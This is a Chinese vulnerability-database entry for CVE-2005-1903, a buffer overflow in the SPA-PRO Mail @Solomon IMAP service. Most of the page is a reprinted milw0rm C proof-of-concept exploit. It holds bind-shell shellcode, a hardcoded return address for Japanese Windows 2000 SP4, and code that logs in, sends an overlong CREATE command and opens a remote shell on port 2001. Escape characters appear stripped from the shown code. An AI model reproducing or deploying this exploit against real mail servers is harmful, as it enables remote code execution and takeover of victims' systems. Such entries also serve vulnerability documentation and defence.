SPA-PRO Mail @Solomon IMAP服务 缓冲区溢出漏洞
| 漏洞ID | 1108834 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 2005-06-02 | 更新时间 | 2005-06-02 |
![图片[1]-SPA-PRO Mail @Solomon IMAP服务 缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2005-1903 |
![图片[2]-SPA-PRO Mail @Solomon IMAP服务 缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200506-027 |
| 漏洞平台 | Windows | CVSS评分 | 2.1 |
|漏洞来源
|漏洞详情
[email protected]的IMAP服务存在缓冲区溢出漏洞,远程认证用户可借助超长CREATE指令执行任意代码。
|漏洞EXP
//**************************************************************************
// e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow
// Vulnerability
//
// Bind Shell POC Exploit for Japanese Win2K SP4
// 31 May 2005
//
// This POC code binds shell on port 2001 of a vulnerable e-Post
// SPA-PRO Mail @Solomon IMAP server.
//
// This POC assumes default mailbox configuration C:mailinbox%USERNAME%
// Any changes to the mailbox configuration will cause this POC to
// fail due to the length differences.
//
//
// Advisory
// http://www.security.org.sg/vuln/spa-promail4.html
// http://www.security.org.sg/vuln/spa-promail4-jp.html
//
//**************************************************************************
#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32.lib")
unsigned char expBuf[] =
"2 create ""
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x55x8BxECx33xC9x66xB9xE8x03x2BxE1x32xC0x8BxFCxF3"
"xAAxB1x30x64x8Bx01x8Bx40x0Cx8Bx70x1CxADx8Bx70x08"
"xD9xEExD9x74x24xF4x5Fx83xC7x0CxEBx53x60x8Bx6Cx24"
"x24x8Bx75x3Cx8Bx74x35x78x03xF5x8Bx7Ex20x03xFDx8B"
"x4Ex18x56x33xDBx8Bx37x03xF5x33xC0x99xACx85xC0x74"
"x07xC1xCAx0Dx03xD0xEBxF4x3Bx54x24x2Cx74x09x83xC7"
"x04x43xE2xE1x5ExEBx16x5Ex8Bx7Ex24x03xFDx66x8Bx04"
"x5Fx8Bx7Ex1Cx03xFDx8Bx04x87x01x44x24x24x61xC3x89"
"x75xF4x68x8Ex4Ex0ExECx56xFFxD7x59x33xC0x66xB8x6C"
"x6Cx50x68x33x32x2Ex64x68x77x73x32x5Fx54xFFxD1x8B"
"xF0x68xD9x09xF5xADx56xFFxD7x5Bx83xC4x20x6Ax01x6A"
"x02xFFxD3x89x45xD0x68xA4x1Ax70xC7x56xFFxD7x5Bx33"
"xC0x50xB8xFDxFFxF8x2Ex83xF0xFFx50x8BxC4x6Ax10x50"
"xFFx75xD0xFFxD3x68xA4xADx2ExE9x56xFFxD7x5BxFFx75"
"xD0xFFxD3x8BxCCx6Ax10x8BxDCx68x35x54x8AxA1x56xFF"
"xD7x5Ax50x50x53x51xFFx75xD0xFFxD2x8BxD0x68xE7x79"
"xC6x79x56xFFxD7x58x89x45xF0x8Bx75xF4x83xC4x20xC6"
"x04x24x44xC6x44x24x2Dx01x89x54x24x38x89x54x24x3C"
"x89x54x24x40x8BxC4x8Dx58x44x68x72xFExB3x16x56xFF"
"xD7x5AxB9xFFx63x6Dx64xC1xE9x08x51x8BxCCx53x53x50"
"x33xC0x50x50x50x6Ax01x50x50x51x50xFFxD2x5Bx68xAD"
"xD9x05xCEx56xFFxD7x58x6AxFFxFFx33xFFxD0xFFx74x24"
"x48xFFx55xF0xFFx75xD0xFFx55xF0x68xEFxCExE0x60x56"
"xFFxD7x58xFFxD0x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"xe9x4fxfexffxffx41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x54x54x54x54"
"x55x55x55x55x56x56x56x56x57x57x57x57xE9x0CxFExFF"
"xFFxCCxEBxa0x5AxD6x19xF8x74x41x41x41x42x42x42x42"
"x43x43x43x43x44x44x44x44x45x45x45x45x46x46x46x46"
"x47x47x47x47x48x48x48x48x36x49x49x49x4Ax4Ax4Ax4A"
"x4Bx4Bx4Bx4Bx4Cx4Cx4Cx4Cx4Dx4Dx4Dx4Dx4Ex4Ex4Ex4E"
"x4Fx4Fx4Fx4Fx50x50x50x50x51x51x51x51x52x52x52x52"
"x53x53x53x53x54x54x54x54x55x55x55x55x56x56x56x56"
"x57x57x57x57x58x58x58x58x59x59x59x59x5Ax5Ax5Ax5A"
""rn";
void shell(int sockfd)
{
char buffer[1024];
fd_set rset;
FD_ZERO(&rset);
for(;;)
{
if(kbhit() != 0)
{
fgets(buffer, sizeof(buffer) - 2, stdin);
send(sockfd, buffer, strlen(buffer), 0);
}
FD_ZERO(&rset);
FD_SET(sockfd, &rset);
timeval tv;
tv.tv_sec = 0;
tv.tv_usec = 50;
if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
{
printf("select errorn");
break;
}
if(FD_ISSET(sockfd, &rset))
{
int n;
ZeroMemory(buffer, sizeof(buffer));
if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
{
printf("EOFn");
return;
}
else
{
fwrite(buffer, 1, n, stdout);
}
}
}
}
#define ADDR_POSITION 534
#define RET_ADDR 0x74F819D6 // CALL EBX in Japanese Win2K SP4
// First short jump backwards. (EB AO)
// You should know what to change here, landing onto INT 3 to let debugger kick in.
#define FIRST_BACKJMP_INST 0x5AA0EBCC
int main(int argc, char* argv[])
{
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in sin;
int err;
char inBuffer[10000];
char loginBuf[1000];
if(argc != 4)
{
printf("nUsage: %s <imap username> <imap password> <ip addr>n", argv[0]);
return 1;
}
if(strlen(argv[1]) <= 0 || strlen(argv[1]) > 20)
{
printf("nInvalid IMAP username! Maximum username length is 20.n");
return 1;
}
if(strlen(argv[2]) <= 0 || strlen(argv[2]) > 14)
{
printf("nInvalid IMAP password! Maximum password length is 14.n");
return 1;
}
memset(loginBuf, 0, sizeof(loginBuf));
_snprintf(loginBuf, sizeof(loginBuf), "1 login "%s" "%s"rn", argv[1], argv[2]);
loginBuf[sizeof(loginBuf)-1] = 0;
int retPos = ADDR_POSITION - (strlen(argv[1]) - 1);
*((DWORD *)&expBuf[retPos]) = RET_ADDR;
*((DWORD *)&expBuf[retPos-4]) = FIRST_BACKJMP_INST;
wVersionRequested = MAKEWORD(2,0);
err = WSAStartup(wVersionRequested, &wsaData);
if(err != 0)
{
printf("nWSAStartup Error.n");
return 1;
}
if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)
{
printf("nWinsock Version Errorn");
WSACleanup();
return 1;
}
SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
sin.sin_addr.s_addr = inet_addr(argv[3]);
sin.sin_family = AF_INET;
sin.sin_port = htons(143);
printf("n[+] Trying to connect to %sn", inet_ntoa(sin.sin_addr));
if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
{
int size;
// read IMAP banner
size = recv(s, inBuffer, sizeof(inBuffer), 0);
if(size == SOCKET_ERROR)
{
printf("[-] Error receiving IMAP banner!n");
return 1;
}
printf("[+] IMAP banner received!nn");
fwrite(inBuffer, 1, size, stdout);
printf("n");
if(send(s, (char *)loginBuf, strlen((char *)loginBuf), 0) == SOCKET_ERROR)
{
printf("[-] Error sending login!n");
return 1;
}
printf("[+] Login Sent.n");
size = recv(s, inBuffer, sizeof(inBuffer), 0);
if(size == SOCKET_ERROR)
{
printf("[-] Error receiving login reply!n");
return 1;
}
if(strstr(inBuffer, "OK"))
printf("[+] Login successful!n");
else
{
printf("[+] Login failed!n");
return 1;
}
if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR)
{
printf("[-] Error sending exploit!n");
return 1;
}
else
{
printf("[+] Exploit sent!n");
}
Sleep(2000);
//================================= Connect to the target ==============================
SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock == INVALID_SOCKET)
{
printf("Invalid socket return in socket() call.n");
WSACleanup();
return -1;
}
sin.sin_family = AF_INET;
sin.sin_port = htons(2001);
sin.sin_addr.s_addr = inet_addr(argv[3]);
if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
{
printf("Exploit Failed. SOCKET_ERROR return in connect call.n");
closesocket(sock);
WSACleanup();
return -1;
}
printf("[+] Exploit successful!nn");
shell(sock);
closesocket(sock);
}
else
{
printf("[-] Cannot connect!n");
}
closesocket(s);
WSACleanup();
return 0;
}
// milw0rm.com [2005-06-02]
|参考资料
来源:XF
名称:spa-pro-create-bo(20862)
链接:http://xforce.iss.net/xforce/xfdb/20862
来源:MISC
链接:http://www.security.org.sg/vuln/spa-promail4.html
来源:OSVDB
名称:16990
链接:http://www.osvdb.org/16990
来源:VUPEN
名称:ADV-2005-0680
链接:http://www.frsirt.com/english/advisories/2005/0680
来源:SECUNIA
名称:15573
链接:http://secunia.com/advisories/15573
来源:SECTRACK
名称:1014095
链接:http://securitytracker.com/id?1014095
相关推荐: Compaq Management Agents for Netware Plaintext Password Vulnerability
Compaq Management Agents for Netware Plaintext Password Vulnerability 漏洞ID 1103729 漏洞类型 Design Error 发布时间 2000-11-06 更新时间 2000-11-…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666